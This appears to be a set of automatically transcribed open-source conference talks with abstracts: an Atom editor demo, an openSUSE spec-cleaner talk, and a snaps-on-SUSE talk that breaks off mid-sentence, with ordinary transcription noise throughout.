out. For example, I have this Markdown file which means Markdown file is quite popular these days and it is at many places, at GitHub especially and they write documentation in it. So as you can see, it has nice syntax highlighting which is nothing unusual, but it has a nice feature which is live preview which means you can easily see the rendered version including images. And here's some nice shortcuts, if you want to add some table, you just write that and then you can easily add some headers, change the titles and you will immediately see the results. So if you are editing Markdown quite a lot, it's useful especially if the file has some huge structure, many sub-items, tables and so on, so that if you can see the live preview, it makes it easier. So if you change something, you will immediately see some markers on the left side. Green plus means it's a new code because it tracks the changes compared to current Git checkout. If you change something, it can compare it with the current head state. If you remove something, you will see minus, if you modify something, you will see orange bullet. The nice feature is that if you're doing some changes and suddenly you see, I want the DT original text, just click the icon and you can easily revet back to the original state or easily revet the removed section. So if you are doing some changes and you want to go back, then you can do it quite easily. It has some nice navigation like if you press Ctrl plus R, it will show you the main header so you can easily switch to the section you need or you can even write something and it will search. So you can easily find your section. And this indexing works also in Ruby and C++ file or actually any file which supports this feature or has a plugin for this. So that means you can navigate really quickly. Another feature which I like is open on the GitHub feature. For example, in the S-Team, we communicate via IRC and sometimes you need to send a location in a file to call it like, hey, something doesn't fit me, do you know where is it or how it's defined, where is it? So usually you would somehow point or need to find a file and put it into IRC. The nice feature is that you can directly open on the GitHub. And the most interesting thing which I actually forgot to mention at the beginning is that every command which is defined in a DOM is listed in so-called command palette. So if you press Ctrl, Shift, P, you will see this menu and it lists all commands which are defined in a DOM. That's pretty nice feature. For example, in Vim there are many features, but if you don't know them, then you can't find them or you have to Google and look in the manual. That's quite difficult. Here you can simply open the list and you can type and it will find it. So if you write GitHub, you have several options and if there is a shortcut, you can see the shortcut on the right side so you can land the shortcut quite easily. So here I use the first one which is the file. So if I press it, I will immediately see the same file and the same line at GitHub. So you can copy and paste to IRC. Actually, you don't have to copy and paste because there is another option which simply copies directly to the clipboard. So you can just paste it and that's it. For many languages, there are so-called linters. That means while you are typing, there are some checks around behind in background. So for example, in Ruby, if you write something like this, it will immediately complain that there is some assigned but unused variable. So if you are writing some code and you forget something, you will immediately see some wordings in the code. There are even some plugins, for example, for RuboCop. So it could immediately tell you, hey, there is one extra space or there is one space missing, but actually I don't use it because rather I run the RuboCop auto-correction and it fixes this for me. So yeah, I'm done. And another nice feature is why are the doc blocker plugins? So if you write the documentation commands. Unfortunately in this file there is some command is, but if you start like this and press tab, it will immediately search for the variables and you can just rewrite the default descriptions so you can easily document your code without writing and copying the parameter names and so on. Unfortunately, this currently doesn't work for Ruby. C++ means I think Python is supported. Unfortunately, Ruby, which we use in this, is not supported. As I said, many features are supported by plugins. So for example, there is a Travis plugin, so there is this small green icon. So again, if you click the details, it will immediately open the log on Travis. So if it fails, you will see a red icon there. So just clicking there, you will immediately see the log and you can find why it failed, it was wrong. And the last feature I mentioned, actually, it's a plugin which was built by myself in doing Hack Week. In two days, I was able to do a simple plugin which opens links. So if you put your cursor on some Baxilla number and press a shortcut, the back number is immediately open. And it works also in the code. So if there is a command in the code referring to Baxilla, it opens this Baxilla immediately. And it supports many other, like, even fade and the other bug reporting too. So you just press shortcut and you can immediately see what the feature is about. And that was quite easy to implement. So now let's switch to the Hackability features. So, the most interesting thing is this. It's a developer tool. You are probably very familiar with it. And it actually reveals how all it works because as you can see, it's basically the page inspector from Chrome browser, but it actually means that the whole thing is a single web page application running inside modified Chrome environment. And all things are done basically in JavaScript, HTML and CSS. So if you are familiar with these technologies, if you are familiar with web development, then you can quite easily hack on a tome or write plugins and so on. So it's quite convenient. And this ensures that there are quite huge of the developers or potential developers behind this. And that also means you can use normal NPM packages for Node.js, like the Travis icon. It does not implement whole functionality from scratch. It uses the standard Travis NPM package. And just it's a small verper around it. So that means the Travis communication has been already implemented in some package. In this case, they just verped it and just display the icon and the UI stuff. But the core has been already there and just used the package. So that means you can quite easily introduce new feature without implementing this stuff around. So that means if it's HTML, which is CSS, that means you can quite easily change the UI. If you don't like the default style, by the way, this is not the default. The default is dark. I use this slide theme. But anyway, you can quite easily change whatever you want in the UI. For example, using this navigator, you just need to find the decoric class names and so on the path to the widget in the tree. But basically, it's just like changing the UI in a web page. So I have some examples. If I uncomment this and save, then the status bar at the bottom changed the color to black. If I say it, comment it and restore it. Another example is the close icon here at the tabs. You can see that close icon, but maybe you want to change the color. You want to make it more visible. So you can quite easily change it to red color or even make it bigger. So now it's more visible. And then you can just find to make some padding at the top. So it looks better. So that's it. So this way you can quite easily change the UI and make it look as you wish. Or you can define a completely new theme. If you don't like the color schema, you can quite easily create a new one from scratch. Actually there is some generator which can create a template for you. So you can create a theme package quite easily. The last example is about the cursor, so again you can change it to red. Change the width. One pixel is probably not visible, so let's make it this way. So you can change the UI very easily. So yeah, that's about changing the style. Of course you can extend the functionality. By default there is some init file which is loaded at the startup. I have just a short example which defines some new command. So this defines a new command, lipsum insert, which inserts into the active text editor some text. For this we need to restart the editor because this is not loaded automatically. So we have to restart it. And then we can see our command in the menu. So if we start it, the text is added there. Having a command is nice. So what about having a keyboard shortcut? So there's another config file where you can define your shortcuts, either for commands which don't have any shortcut assigned or you can change because sometimes maybe you are used to some keyboard shortcut and you want to use the same. So you can redefine. And another use case is that maybe some plugins conflicts because there are currently 8,000 plugins and maybe sometimes you find that two plugins or more might conflict. They use the same shortcut. So here you can already define it. So we assign control shift Q, restart the editor. And so now whenever we press that shortcut, the text will be added. So that's very simple way how to extend the editor. If you want to promote changes or bigger changes, then it's convenient to start a new plugin. So instead of changing your local configuration, you can create a plugin which is quite easy because there is a plugin which generates a new plugin. So you can quite easily create a template for new file. You don't have to start from complete sketch. This is the bugzilla, the Mac number opener which I mentioned earlier. The last thing I like to show is that if you write plugins, you can write a test for it. So if you run a shortcut, it will start this. Unfortunately, this plugin was written like two years ago and doesn't work or it works as you have seen, but the test doesn't pass in the latest atom. But there's some just initialization bug. But what I wanted to show is that even for your plugins, you can write integration test and you can run them at Travis, which I do for this plugin, which is pretty cool because for many VM or IMEX plugins, there are no tests, no way how to ensure that they work. With Atom, you can write nice plugins and properly test it, even use nice continuous integration with Travis. So whenever you get a request from someone to change something, you can be sure that the autos still pass, so it doesn't break. So this is a really cool feature I like. So that's basically it because I could continue quite a long, but I like just to show you some most interesting parts. The best way is to simply download and install it and try it by yourself. There are some links, but I will put them into the slides because I already mentioned these in some of my previous blog posts, so you can look there. And if you don't have questions, any questions, please? No? Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.ぶん Bye. Bye. Bye. Bye.
This is a short introduction to the Atom text editor. The authors describe it as "A hackable text editor for the 21st Century". It is an open source editor originally developed by GitHub but with large community around. In this talk I will describe my experience with the editor and highlight some interesting features. I will also briefly mention what the "hackable to the core" feature means.
10.5446/54447 (DOI)
So, hello, everybody. I am Tomas Kváthal. And I will give you some short information about what the spec cleaner is, what are our plans, and basically how much we can fuck up your life with your package. So firstly, what is actually spec cleaner or spec cleaner or however you would desire to call it? It's our tool that makes sure that all the packages we are producing in our distribution kind of look the same. You can ensure that all the definitions are in the same place across the board, or the conditionals are in one location, all the dependencies are sorted in some specific order. Well, now alphabetically I think, but it can be changed. So if you desire some changes in there, you can basically say that A should be always on the line 32 and it will really be there. After that, we also use it to fix common issues. For example, we have plenty of packages that have conditionals from SLE9 or SLE10 ensuring that they build on power. That's kind of useless for current Tumbleweed or SLE15. So the spec cleaner actually finds it, detects it, and wipes it out. Alternatively, it also replaces some old commands with the new versions of them. So you can remove the craft. So in a case you are, for example, maintainer of parallel code base in OpenSUSE, you can decide that these syscalls are no longer to be used. And tell spec cleaner, this is a replacement, A for B, or even multiple variables, and it will make it happen. Now where we are using it? We are using it mostly as a package, so anybody writing packages can run it on his own by using the command spec cleaner. But alternatively, Haskell people are running it for all the packages they are generating. Whereas every time they generate something from Cabal, they actually parse it over so they ensure that it always looks the same. Cloud guys actually, I'm not sure where they are using it, but I suppose the OpenStack is somehow using the spec cleaner tied in to generating the packages for Fedora and us, as in suzi slash open suzi. And now Matičík, one of the members of PEC team, is converting PEC packages semi-automatically using the spec cleaner with kind of hex code base to ensure that the old Python packages can be kind of streamlined to the new single spec format. Now for features, what actually people often forgot that we have there, those are not enabled by default, but you can have fun with them, are conversions. So in a case you have an old spec file, you can actually tell the spec cleaner to convert all the dependencies to the new syntax of package config and bracket it something, parallel bracket it something, tag, C mic. Basically it has a binding list of conversions from currently released Leap, so now 42.2, and it will convert all the old style dependencies to the new ones. That means that later on your package should be perfectly fine to build even on Fedora or anywhere else. One other feature that's really useful is exclusion of spec cleaner. Basically in some cases you don't want to run it ever on your package. Take as an example GCC. Nobody would like to parse that blob at all. So you can put this comment in there and it will basically skip it out. And last big feature is basically code block detection. That means that you can actually use comments to actually put something together and ensure it stays together within the spec file and it won't be moved by any cleaning script. It can be used mostly for example if you have LVM, you can split it into multiple parts and have common code blocks that are detected by the spec cleaner and ensure that they are same. You can see it now in the distribution if you check the LVM2 package, there are three spec files and they all have the common code blocks in there. Basically it can be considered conditionals but they are comments instead. And the last feature that spec cleaner actually has compared to the tool we are using now, the format spec file, it has a really big test suite. At this point I am not really sure how big it is so let's take a look. I closed the browser unfortunately. So now we are covering 92% of the code base is covered by tests and there are loads and loads of them. So at this point of time these are various spec files containing features that are in the spec file and we are making sure that nothing breaks when we are developing or breaking the stuff within the spec cleaner. So apart from this basically the rest is just formatting. Just remove something, add something, replace something. Overall we also have plans within the spec cleaner which are kind of important issue. So first one is pretty bad. We want to replace the format spec file and we have a GitHub issue for that and unfortunately we need to make sure that we are not running the spec cleaner on the maintenance updates because if you imagine that you have a tool that does heavy changes within the spec file even if they are not dangerous, that's something you want to avoid to happen within the maintenance window and we are now not able to do that with OBS so we are figuring out how to work around that. Another issue we have is a new RPM, has a new and lovely syntax for dependencies where you can use and or and other stuff which surprisingly breaks all our tools we have. So that also needs a bit of work. Usually mostly people when they are using spec cleaner they are complaining about the feature that ensures that all the variables are having curly brackets around them compared to commands. So in minimal mode this is already disabled but I opened an issue to actually provide a separation to have another option that also allows the user to specify themselves. So if you really hate curly brackets around the code or around variables you can still override it even on a full run. The last thing we are working with is cleaning up preamble parsing to be more readable. It's working at this point of time but unfortunately the class had something like 40 kilos and it was not really readable so we are slowly reformatting it to have it a bit more readable for anybody to actually join in. So that's basically what the spec cleaner is and now how you could actually help and why am I giving this talk. Actually I fixed all the issues I or the packaging team had with it so we are able to process all the packages we are maintaining, we are using, it can pass it, it won't break it and it's fine. But if you are a package maintainer and the tool is actually breaking something for you, if you open a bug we can fix it, we can create a test case and we can make sure it will never break again in any fashion. So apart from reporting the bugs of course you can expand the test suite so if you know that something is constantly breaking for you, just create a pull request and basically add into this folder in the spec cleaner basically another spec file that contains the code, how it's looking before, how it's looking after and that's it. You don't even have to know how the spec cleaner actually works. Just before and after spec files, that's about it. Back to the proper window, come on. And also if you are the project maintainer and you want to replace something everywhere because you know everybody screwed up or majority of people screwed up or used some old macros, you can also add some replacement parts for this in the spec cleaner so it will be automatically replaced. It's actually pretty nice. The spec file is split into various areas and basically if you want to replace something in install, you just find the install section and write any code for replacements you want to do in here. Now it simply fix LA files and install command. Nothing much. But if you found some common issue in there, just a simple pull request or GitHub issue and we can make it work. The idea behind all this is to make sure that all the spec files are unified, ensure that they are running, working in correct fashion and basically in the long run, the maintenance should be easier because everything looks alike. Now how to actually find and report issues? Well, we have the GitHub page which I opened at the top so anybody can go there, report issues, create pull request, you can email me directly or you can contact us on the open Susie factory. We are basically hanging out there because there are all the packages. So apart from that, now we have four minutes so let's go for questions and if you are not working at Susie yet, as I see a lot of people here are, we are still hiring so don't be afraid to apply. So questions, anybody? Hello. I have a question on how to actually use this spec cleaner. I maintain a package or set of packages and how I'm supposed to use it. Is it run once or whenever I touch the spec file and I need to run it or would it make sense to put it in as a part of, for example, continuous integration so whenever we change something, it runs automatically or yeah. So overall you can run it on your own of course, just the spec cleaner and the parameters on the command line. Alternatively, if you've seen Peter's presentation about Haskell yesterday, basically they run it as a part of the continuous integration. They do some kable to spec and then parse it with the spec cleaner and there is also integration the same like you have the format spec file. Let's run on each commit you do in the build service if you have it installed. So the same way it can be injected as a spec cleaner, there is a package called spec cleaner, replacing something, I will have to enlarge the screen. Let's hope it will be fast. So this is the spec cleaner and this is basically shovel in replacement for the format spec file. This will ensure it will run on all your commits. Of course, the spec cleaner is more invasive than the format spec file. So you should not do it unless you really want to replace all the format spec file runs. But you can. Okay, thanks. So anybody else? Anything? I don't bite that much. Okay, so thank you for your time and have a nice rest of the conference.
How to be lazy and keep pretty spec files Just short talk to discuss the plans focus and future of the spec-cleaner tool and its incorportation in the distribution.
10.5446/54448 (DOI)
Welcome. Thanks for coming. So, snaps on SUSE. Just before we start. Raise your hand if you know I should be here, right? Okay. Raise your hand if you know what snaps are. If you've heard of snaps. Thank you. And keep your hand up if you know if you've used them. Okay. So, hi. I'm Zygmunt. I'm working for Canalical, not for SUSE. I've been working with them since like 2010. And I've been working on Snappy for a year about where I give it a take. And specifically on the interface system, which we're going to get into, it's really interesting. But for me, what we'll make no more is the cross-distribution and advocacy towards snaps just everywhere. Snaps is a universal way to run and host applications. So, just briefly, I'm just going to go into snaps, not that many people hold their hand up. I'm just going to describe snaps, how they function, what they look like. And specifically, snaps and SUSE, where are we, what kind of things we did, and some plans for the future. And hopefully, we're going to have some time for questions, but we'll see. So, snaps are packages. I keep hearing containers, containers, docker. Snaps are packages. It's just like a package system. They're slightly different. They're not like a classic package system. They really are packages. And you'll see quickly why. Kanonga has had many interesting, you know, evolutions of the packaging system. We did the phone products. You know, the traditional packages, this didn't work very well in that setting. Like, there's no depth conf you can, you know, answer a prompt, look at the diff on your phone. There's like, many things just didn't work. And you also had to look at how the modern app stores work. Everything is confined in known reviews applications, you know, line by line. There's mislits or proprietary. You can't do that. So, we had to come up with something new. So, we went through the click with a C packages for the phone. And when the snaps from the previous generation, which looks slightly different. And now we come to snaps with snapd 2.0. So, they're not like classic packages. First of all, the read only. It's not like, you know, you unpack your software and, you know, something is in var. You can change it. They're just read only images. And since the read only images, we don't have to unpack them. You don't have to read the disk. You can just mount them and start working with them. We also don't have a single version of a snap. So, maybe I have, I'm updating from one to another. There's a new version coming out. My system will update this application for me automatically. I will keep multiple versions around. We call them revisions. They're not quite versions. We'll see how soon. And we can use it because we have them around on the disk. We can do delta updates. So, we just download the little changes that happen between one and the other. We apply the delta and we mount the new thing. And that's it. That's the update. And you can also go back. And so, because snaps know exactly how to model data, where the application data is kept, where the user data is kept. When we do these operations, we can keep the data around. We can copy it somewhere safe. So, we can get the update. And when something breaks, I don't know, for whatever reason, you had like an image collection application and the schema has been updated. But the application doesn't work. You can say, you know, this doesn't work for me. Give me the stuff I had just a second ago. And we'll give you back not just the code, but the actual data you had in your system. Because this is also managed by snaps. And I think this is really the key thing. In today's world with security, like we've been discussing security this week. And everyone seems to figure out it's important, but it's hard. It's complex. We don't really know how to do it. Snaps have been trying to solve that since like version one. And now with version two, it's infinitely easier to get security right. Because everything is confined by default. Not only just like you just get confined, you can't do something. Everyone has the same confinement. It's predictable. It's understandable. Both for developers, how to do stuff with snaps. All the users, what kind of stuff you can expect if you get a snap from somewhere and run it. I just was in a really interesting app image discussion. And I think I mentioned this is great. But in today's world, you can't afford to just get something from somewhere and run it and not confine it. It's just 90s. We just can't repeat that. And also, snaps are not containers. They're not like you get this Docker image. It's full of ancient Ubuntu devs. And run it and hope for the best. It's not. We don't have the whole system in a snap. It's not like you have to put gobs of bytes in it to actually get started. You'll see how a snap looks like in a second. But this also means that because we don't bundle an operating system with a snap, a snap actually integrates in an operating system. So a snap can provide a DBS service. It can provide a service in a socket. It can just integrate with service just as you would expect with a classic package. So snaps are different because they can work alongside the existing packages. You can work with snaps on essentially all the major distributions. Now whatever they're using, it's completely different, right? But the same binary snap works and integrates with that distribution. It doesn't replace it. It just integrates with it. And really, I can't stress this enough. I've been packaging snap D for many distributions. And it's not easy. It's just a lot of complexity for good reasons. It exists in traditional classic packaging. And that's hard to get. You know, we're going to keep doing this for some more time until we're absolutely everywhere where there's any relevant user base. But it's not easy. And if you think of application being packaged by a small company, they want to do something nice, something innovative, I don't want to waste their creativity on the same Debian packaging policy. It's just crazy. So Bunt also has PPAs that many people use not only distributed software, but also distributed new software, like a new version of, I don't know, the bleeding edge photo application. Like I use Darktable, so a new Darktable. So PPAs are fantastic. But they also share all the drawbacks of classic packages. You know, I can add a PPA to Darktable and someone can steal the developer's laptop. And in that PPA, suddenly, a kernel can show up. And you know, it could be like 99999, hell, boy, I'm going to update. And I don't want to do that. I just don't want to give all the confidence and trust to every PPA, because every PPA or every extra archive I enable just multiplies the attack surface. All of them can be owned and all of them can ship kernel, libc, libssl, and you know, it could be covert. Maybe no one will notice for a while. That's terrible. We don't want to repeat that. So with snaps, we've invented something way better. It's like a mini PPA, mini archive, just for this snap. And you'll see how this works soon. And this is close to my heart, because this is what I do essentially all day. Snaps are heavily focused on security. There are many interesting security mechanisms we're using. And this is like goes all the way through the system. We are paranoid about security. And in today's world, that's really relevant. So why? That's why. Not only everywhere, but everywhere. In way, way, way more refined and predictable and secure way than all the other systems can do today. And you know, we have things to do, but there's nothing missing in division. There's nothing missing in the technology. It's just more busy work to get there. So we're going to quickly look at a simple snack package. And so snack package isn't really, really simple. Both in the way you build them, we don't have complex policies. You can just build them any way you like. We have some nice tools if you want to use them. Entirely optional. You can just handcraft it. But we're going to look at a package from Snapseast.com. How does it look like? So it's going to be really small. It's just the application. No OS. If you need something that the OS doesn't provide, well, you need to bundle it. But you don't have to bundle, you know, lip-seize and lib-s-sales and things like that. We provide that as a base you can work on. Right now, that base is just a Buntu, but we're working heavily to not only give you one Buntu, but the next LTS Buntu and also any other distributions, LTS versions. So you can start, you know, an application that works entirely on top of Sli, using Sli, lip-seize, the built with Sli toolchain, all of that, you know, in a way. So how does it look like? It's really actually, I mean, you don't have to read this. That's the whole thing. So the only important part, I would say, is the name. Name is something you hold, dear. It's like, this is how you identify yourself. This is how you see the world, but it's something, you know, that's your copyright, your trademark. It's something you want to hold. So even, you know, I can go and try to claim the name Skype and maybe I'll be lucky and get it. And, you know, maybe Skype and Microsoft guys are going to call us and say, you know, we're not making Skype as a snap yet, so maybe you want to pull it out. But what we can do is without changing the existing snaps, we can rename them. So names are yours if you can claim that name, but they're also not a firmly attached property of a snap. Snaps don't have names. They have IDs. And interestingly, they don't have a version. They're like, oh, my God, how many times do I have to look up how the Debian version thing works? Man, I hate that. It's just for this, versions are nice for people. They don't mean anything at all. Nowhere in snaps. They're just a label. So some silly metadata. Really simple. We can use upstream. So like a storefront can give you way richer experience in a standard way that people have read about, but just like a very simple approach, you can just stick something here. And you can see this in listings and searches and so forth. And this is interesting. So you can have multiple things in a single snap. You can have my CQ that has the demon and also some tools like the dumps to like CLI and whatnot. You could be a single one. You could be many. You can have services. You can have desktop apps. You can have CLI tools. You can have hooks, which are kind of special, but you can think of them like on a package installation hooks, like all the traditional packages have. So you have to list all of them here. And what's interesting, what we're coming onto is that all of them are confined. There's no way to break out the sandbox. It's like, you know, you can install like a benign package, but the configure script is just going to add an extra repository to your system. No, not doable. So that's how a simple snap looks like. It's just like, you know, fits on the screen with a really big font. There's nothing there. There's no S. Just what you care about. And the layout really is arbitrary. It could be, you know, whatever you, you could be like a mini truth. It could be whatever you want. We don't care. We only get about the meta directory. And inside that, we have the precious snap yaml file that tells you lots of information about your snap, as well as some support files like you can have like icons and a couple of other things that are not worth mentioning now. So you installed it, but how do you run it? You don't want to go back and like figure out where it's going to be and run slumping and bin and echo and that's not what you want to do. Snap, when you install a snap, when you install a snap, gives you those launchers, put them on your path. And if you look at how they look like, they're just sim links. So, you know, we do the magic. We follow the system, figure out what you want to do and you run them. And actually it's not just going to run, you know, this echo command here. It's actually going to look at your snap yaml and figure out the command you had there. And these files are just available. You can, you know, you can have one binary and multiple ways to run it. So let's talk really briefly about building. I saw fantastic things about OBS this week. So we made our own, sorry. We have something called build snapcraft IO and snapcraft. So snapcraft is just an opinionated way to build snaps, but not the only one. You can really handcraft the millennium you like. But it's a nice service we provide. And snapcraft also is a nice twist in packaging. Like, if you look at traditional packages, you'll also see that, you know, they're nice. If you have a not a tools based system, it's super nice. Like, almost empty. The packaging is automatic. If you use, I don't know, Python, it's also automatic. If you use Ruby, it's also automatic. But boy, try to combine them together and now you have to unwind all the stack and figure out how to glue this together. So we wanted to fix that. Snapcraft divides a package into parts. So I can say, no, I want to take this Git repository and build it. And, you know, it's some Java code. So let's use add. I know nothing about Java. So maybe I'm going to talk rubbish. But all of these things integrate well with what they're made for. Everything that is popular either has a plug in snapcraft. It's easy to build or, you know, it's really easy to build such a plug in the contribute. Many of these are community made. And the building part is super easy. It's just, you know, you memorize the, recall the snap YAML file and just add this to the bottom. There's going to be a part and you can have as many as you like. And each part just says, you know, I'm a CMake like part. So build me CMake ways. And the code can be in many places. You have like a Git tree somewhere or a terrible on your disk or a tag on it. All the complexity is possible. But it's simple if you just take the faults. So you have this nice snapcraft YAML. You can build it locally with snapcraft. Just snapcraft, you get a package out. Now I want to think about just building it automatically when something interesting happens. So obviously we did that. So we have snapcraft.io has built that snapcraft.io website. And this is as easy as it gets. You know, your code doesn't get helped as many people do. You click the login with GitHub. It shows you the repositories you have, the ones that have snapcraft YAML are easy to pick. And that's it. There's no step C. So there's a workflow. We can integrate this through. I'm going to talk about the last part. You can see like how to publish to store. Store is not just a repository. We're going to get into that. But it's really interesting mechanisms are possible in this way. And people like snaps. I mean, we've been talking to many people making applications. Unless they've been like hard code Linux users for ages, packaging is a real problem for them. They really want to deliver desktop applications and server applications. And it's just hard. This is why Docker has such a nice ride because they take that out. But you get this huge blob that's kind of impossible to audit and hard to operate. And I think this is a nice middle ground. And people really like that. And now I'm going to jump to something that's super close to my heart, confinements. But it's also fantastic property of snaps that nothing else has. So it's confinements is not just a sandbox. It's just one sandbox. There are many sandboxes. And everything gets a sandbox. So everything that's runable, application, demon, service, cook, whatever, it's all confined. And as I said earlier, it's the same confinement. You do one snap, you learn how it looks like. You can now make the next snap. It's all the same. Well, obviously, if this was equally simple as classic application to have no confinement, well, it wouldn't be any secure. So it actually sandbox prevents you from doing many things. But for that, we have something we call interfaces, which feels like a permission system. But it's more than that. Traditional permissions that you know, you can do this period. We thought this is nice. Well, we can do better. So we have two parts of every interface. There's a plug part. And there's a slot. The slot provides something. And the plug can consume it and can only consume it when you plug them together when you connect them. And the connection establishes the actual permissions, both for the consuming party and the producing party. So maybe there's a snap that, you know, Bluezy provides a Bluetooth services. And only when there's a connection between Bluezy and some snap can Bluezy actually talk to that snap. Bluezy is not like a privilege snap. No. Everything is confined equally. So snaps can provide services to the system, to other snaps. You can create useful runtimes for other people. You can create services for other people. And it's all confined and managed by snapd. And just to look like quickly as a simple comparison to Android style ACLs, like, you know, can you do this, can you do that? That's terrible. Because every time you look at that, like, take your phone, if it's Android, install an application, it asks for an endless list of things. What it just told you is techno bubble. That, you know, you can be a technical user unless you're like a hard core Android developer. You don't know what that means, really. But you just have a yes or no question. Do you want it or not? Do you want it or not? And that's a terrible question to ask. People want it. Why do you ask? You just ask to install it. You always want this. But if you say yes, you can get really nasty things can happen. And that's not possible in snaps. So interfaces are not privileged. Like, hey, it's a reasonable thing for an application to want to talk to the network, just like, I want to, you know, I'm an RSS feed that want to download some feeds. Network is just an interface that's not privileged. Everyone can get it. Maybe there's a super powerful interface that's almost pick out of the confinements to run like a Docker's nice example. It runs all kinds of stuff. Docker interface is only given to the snap that we allow to have this interface. So Docker guys make dockers. They get the interface. But no one else can say I want to be Docker unless we have a conversation with them. Unless they make a valid claim that they can be Docker. On a local system, on a developer system, they can still kind of shorn it in. But they won't be able to socially engineer anyone into claiming they are Docker or they are something else that has superpowers and break out of the sandbox. This is a really important property. Because, you know, we're in a, live in a world where we make a barrier and the nasty guy is going to figure out how to not break the barrier but walk around it. So one thing that I really like is that snaps can offer service to the system. So it's not like you have the system which is special because it's not confined. And there are the snaps which are like little things, but they can't be super powerful. We built a system, entire distribution out of just snaps. Everything is a snap in that world including regular system services. And they're equally confined and they can have slots. So you can have a snap that provides services. You can come up with a great idea and you can make a snap out of that and that snap can interact with the rest of the system. It's just a graph of connections between snaps. And we have quite a few interfaces today. We have 91. That's a lot. There's like lots of things there. I can't even fit the whole, I tried to fit the whole list here but it was just unreadable. But, you know, all kinds of applications from desktop applications to embedded to cloud, it's already there. And it's super trivial to add a new interface. And because of how we develop SnapD. If you provide an interface, we merge it, it's available to you today. Today. In the same day, you can on your system say I want to track the core snap in which SnapD lives from the edge channel which I'm going to talk to in a second. And you're just going to get the nightly build right now. And you can start using the application with that new interface right now. But before there's an interface available to you, there's something we call the dev mode. It's just for developers. It's really, really scary to install things in dev mode. And it essentially switches the confinement into nonenforcing mode. So you're going to say, you know, you can't do this, but in DevMind I'm allowing it. We also built some tools that look at these logs and say, you know, you're doing these things. It looks like you want this interface or that interface or these two. And it really helps developers. And also, when it just says, you know, but I have no idea what this thing you're trying to do is, let's just really figure out what you want to do quickly and craft an interface for you so you can just keep on going. So let's talk about the store. The store is special. It's a service offering from Canonical. It's not resoftware, but it's a hosted service that is free to use for everyone. You can just put SnapD there. You can get started right now. We can also give you a commercial store on demand. If you're like a device maker, you have a drone and you want to make some apps that run on the drone, but you want to control who can actually put Snaps in your store, you can just have a special store for us. And actually, the store is, apart from being complex and large to scale, it's just a simple HTTP endpoint. There are a couple of things like find a Snap, you know, get a Snap. There's not much there. And it's not a repository. So many people think about, you know, I want to have a second store. I don't mind you guys have your store. I would like to have my store. It's not a repository. It's slightly different. There are choices we did, the choices we've made so that some of the complexity and logic goes away from the client side and goes to the server side. For instance, let's say there are two stores and, you know, it's the same Snap. It has, it's in both stores. What do you do? We don't want to solve that problem. The store can figure out what to do. Maybe it's going to mask one and show the other. Maybe it's not going to show either. But it's the store side decision. And the client side doesn't have to care about this. It's way easier to figure and reason about the correctness of the store. And store handles a lot of things that typical repositories don't handle. It handles like uploads, delta uploads. So when you are developing a game, there was a nice example from the app image developer. It's a big game. And it's great that you can have delta downloads. But jeez, uploading those gigs every moment you want to build, that hurts. So we have deltas both ways. That's really fantastic. We have all the developer workflow, like name registration payments and whatnot, reviews, everything. Also, like if you have a Snap that wants to use a privilege interface, you're going to be, you know, there's a whole process that just lets you use it and lets your Snap have that interface. So it's not going to be blocked next time. But one thing I really like about this store, and I think this really changes how people are going to figure out developing software, is tracks and channels. So it's a really simple concept. I mean, it's basic as it gets. If it is a MySQL Snap, but it's just one MySQL name. There are many major versions of MySQL people may want to use. Since I'm figuring out to encode the thing in the name so people can kind of guess what they want, we just want the developers to choose. So maybe I can show you a demo later. But there are many, many versions of MySQL available, and you can just choose the one you want. And not only that, for every one of these versions, there are four channels. And every one of these channels says, like, what kind of things you can expect. And those are like hard coded. So it's across the whole Snap ecosystem is going to look the same way. This is stable. It means the Snap is confined, and you should expect stable performance and correctness and stability. It's candidate, you know, almost stable, but not quite. There's beta, which, you know, it speaks for itself. And there's edge, which is like something for, you know, the ICD solutions, like just stick it from this, like straight from master. And you can choose on a per Snap basis, what do you want to do? You don't have to be tumble with all the way. You can be on a stable LCS version of your enterprise distro, and then pick the thing you care about to be more leading edge, or just more, more recent doesn't have to be leading edge could just more recent. And this is a per Snap decision. And also, all the other things are per Snap. So like rolling back because updates failed per Snap. You don't have to do it like it's all one big bag. So just I think this is not that interesting. Actually, I should have got rid of this slide, but still store gives you revisions. Revision are something we talk about a lot in SnapD, but it's not a number that is a version. It's just an identifier of a given upload. Whenever you upload something to store, maybe it's like get how built or something you did locally just get a number. But it's not a version that means something. It's your task and responsibility to put that number in a channel. Say in a stable channel, I want number nine, and then DTI 110. So you can get tracks, whatever you like, but there are predefined risk levels that people can understand what they mean, especially the stable channel, which is confined. So let's quickly talk about the SnapD service. SnapD is quite large. I think it's 83 contributors, almost 20,000 commits. There's quite a lot of history there. So it's mostly written in Go because it goes such a good language, right? This type of applications are complex, user space application. It also has some C parts just to make the magic happen at the part that is closer to the OS. And SnapD, I can't stress this enough. There's not enough time to actually go into explaining all of this. I'm not even going to try, but there's so much fantastic resiliency to errors and so much smarts in SnapD. It's not like D package. No, it's far, far more advanced. And what you can do to make your system stable, operational and up to date. So SnapD is a service, but there are command line tools and other clients that talk to it, like the GNOME Software Center talks to SnapD. So when you can install a snap from the GNOME Software Center, it goes this way. It just essentially handles the installation, move and keeping things, everything keeping up to date. And also manages security. So all of the interfaces that I've mentioned, it's not like someone can come up with a new security interface that says they can do anything because it's easy. Now interfaces are trusted, so the part of SnapD itself, SnapD handles the security part. And it's easy to audit, easy to review whatever SnapD can request from the system. It's all the code. It's all versioned. So open Susan and SnapD. We had a long bumpy ride. I think we started this last year. I can't remember exactly. I think it was May. And goank packaging. Goank is such a nice language of packaging. Goank across distribution is completely different. Everywhere you look, and very annoying to work with. And at that time, we just couldn't get it right. So we'd lay dormant in a broken state for some time. But we fixed that sense. We're not all the way there yet, but we have a working package. We just want to go all the way to get it into factory and beyond. And this repository name, I should have mentioned this, is a system called in snappy. So you can get it there. So we have a working package. It works for Leap and for Tambeluit. We update it every time there's a release. We vendor a goank stack. And this is like a cry for help. Can we vendor that? Do we need to put every separate goank library into a separate package and hope for the best? I don't know. I would love to talk to someone that is an expert in goank and SUSE. One thing we like about the vendor for goank itself, because packages are just source packages, even binary ones. So it's kind of meaningless work. But because exact same vendorized versions are used across all the distributions, the QA effort multiplies. We just get more confident than what we tested, extensive, the actually works. And it really does save us a lot of time. But if we have to do it, we'll do it. And one thing we really do very well, I think, lately is we have a very heavy CI system that tests everything we do. So daily development, if I make a patch today and I want to merge it, it's going to be tested on SUSE. Not only on SUSE, but on everything, almost. It's like we test many different architectures and distributions and releases of these distributions. I think we have more than 100. I think we have 200. I think slightly less than 200 VMs, 24-7, booting up in a different system, just testing, 